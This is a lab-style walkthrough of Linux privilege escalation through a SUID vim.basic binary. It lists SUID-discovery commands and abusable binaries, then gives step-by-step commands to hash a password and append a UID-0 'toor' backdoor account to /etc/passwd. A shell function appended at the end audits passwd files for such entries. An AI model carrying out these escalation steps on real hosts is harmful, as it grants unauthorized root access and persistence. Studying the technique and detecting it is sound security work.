Privilege escalation on Linux through a SUID vim.basic file

Reproduce on Kali

First, set the SUID bit on the vim.basic file:

chmod u+s /usr/bin/vim.basic

Next, create a user with normal permissions: adduser test1

This gives a suitable environment for reproducing the privilege escalation.

You can find files with the SUID bit set by using any of the following commands:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Files that can be used to escalate privileges when they have the SUID bit set include:

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

The idea behind using vim to elevate privileges is to modify the /etc/passwd file and add a user with root privileges for yourself.

The format of an entry in the passwd file is: username:password:uid:gid:comment:home directory:user's shell

For example, this is the root user's entry:

root:x:0:0:root:/root:/bin/bash

(The password part is x because the real password is stored in the /etc/shadow file)

Generate a password hash with openssl passwd -1 -salt asd 123 (the option is -1, the digit one, not the letter l).

Then write the new entry directly into the passwd file:

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

If you open the file as the normal user with vim /etc/passwd, saving fails with error E212, telling us that we do not have permission to modify the file.

Instead, open it with the vim.basic file found earlier. Because this program has the SUID bit set, it runs with root privileges and can edit the file:

vim.basic /etc/passwd

Opened this way, the file can be modified and saved successfully.

You can see that the entry has been added. Switch to the new user with su toor, enter the password 123, and then check the privileges with id:

root permissions
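
As an added example (not part of the original article), the shell function below audits a passwd-format file for what this edit leaves behind: a second account with UID 0 and a password hash stored directly in the second field. The function names and the sample entries other than the toor line are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for traces of the edit above.
# Function names and sample entries (except the toor line) are constructed.

# audit_passwd FILE
# Prints one finding per line ("<CHECK> <user or line number>").
# Returns 1 if anything was flagged, 0 if the file is clean.
audit_passwd() {
    awk -F: '
        # Skip blank lines and comments.
        /^[ \t]*$/ || /^#/ { next }
        # A valid entry has exactly seven colon-separated fields.
        NF != 7 { print "MALFORMED " NR; bad = 1; next }
        # UID 0 under any name other than root is a second superuser.
        $3 ~ /^0+$/ && $1 != "root" { print "UID0 " $1; bad = 1 }
        # Field 2 is normally a placeholder (x, * or !) for /etc/shadow.
        # A crypt hash stored here starts with a dollar sign.
        substr($2, 1, 1) == "$" { print "HASH_IN_PASSWD " $1; bad = 1 }
        # An empty field 2 means the account needs no password at all.
        $2 == "" { print "EMPTY_PASSWORD " $1; bad = 1 }
        END { exit (bad ? 1 : 0) }
    ' "$1"
}

# Constructed sample: three ordinary entries plus the line from the article.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
test1:x:1001:1001:,,,:/home/test1:/bin/bash
toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash
EOF
}

# Demo on the sample; on a real host run: audit_passwd /etc/passwd
demo_file=$(mktemp)
sample_passwd > "$demo_file"
audit_passwd "$demo_file" || echo "findings present in $demo_file"
rm -f "$demo_file"
```

On the sample, the toor entry is reported twice, once for each check, while root, daemon and test1 pass.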
